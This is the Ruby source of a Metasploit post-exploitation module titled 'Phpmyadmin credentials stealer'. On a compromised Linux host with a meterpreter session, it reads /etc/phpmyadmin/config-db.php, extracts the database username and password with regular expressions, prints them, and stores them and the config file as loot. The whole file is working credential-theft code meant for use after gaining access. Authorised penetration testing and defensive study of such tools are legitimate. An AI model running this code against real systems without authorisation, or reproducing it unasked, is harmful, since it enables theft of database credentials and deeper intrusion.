modules/post/linux/gather/phpmyadmin_credsteal.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Phpmyadmin credentials stealer',
'Description' => %q{
This module gathers Phpmyadmin creds from target linux machine.
},
'License' => MSF_LICENSE,
'Platform' => ['linux'],
'SessionTypes' => ['meterpreter'],
'Author' => [
'Chaitanya Haritash [bofheaded]',
'Dhiraj Mishra <dhiraj@notsosecure.com>'
]
)
)
end
def parse_creds(contents)
db_user = contents.scan(/\$dbuser\s*=\s*['"](.*)['"];/).flatten.first
db_pass = contents.scan(/\$dbpass\s*=\s*['"](.*)['"];/).flatten.first
unless db_user && db_pass
print_error("Couldn't find PhpMyAdmin credentials")
return
end
print_good("User: #{db_user}")
print_good("Password: #{db_pass}")
print_status('Storing credentials...')
store_valid_credential(user: db_user, private: db_pass)
end
def run
print_line("\nPhpMyAdmin Creds Stealer!\n")
if session.platform.include?('windows')
print_error('This module is not compatible with windows')
return
end
conf_path = '/etc/phpmyadmin/config-db.php'
unless file_exist?(conf_path)
print_error("#{conf_path} doesn't exist on target")
return
end
print_good('PhpMyAdmin config found!')
res = read_file(conf_path)
unless res
print_error('You may not have permissions to read the file.')
return
end
print_good('Extracting creds')
parse_creds(res)
p = store_loot('phpmyadmin_conf', 'text/plain', session, res, 'phpmyadmin_conf.txt', 'phpmyadmin_conf')
print_good("Config file located at #{p}")
end
end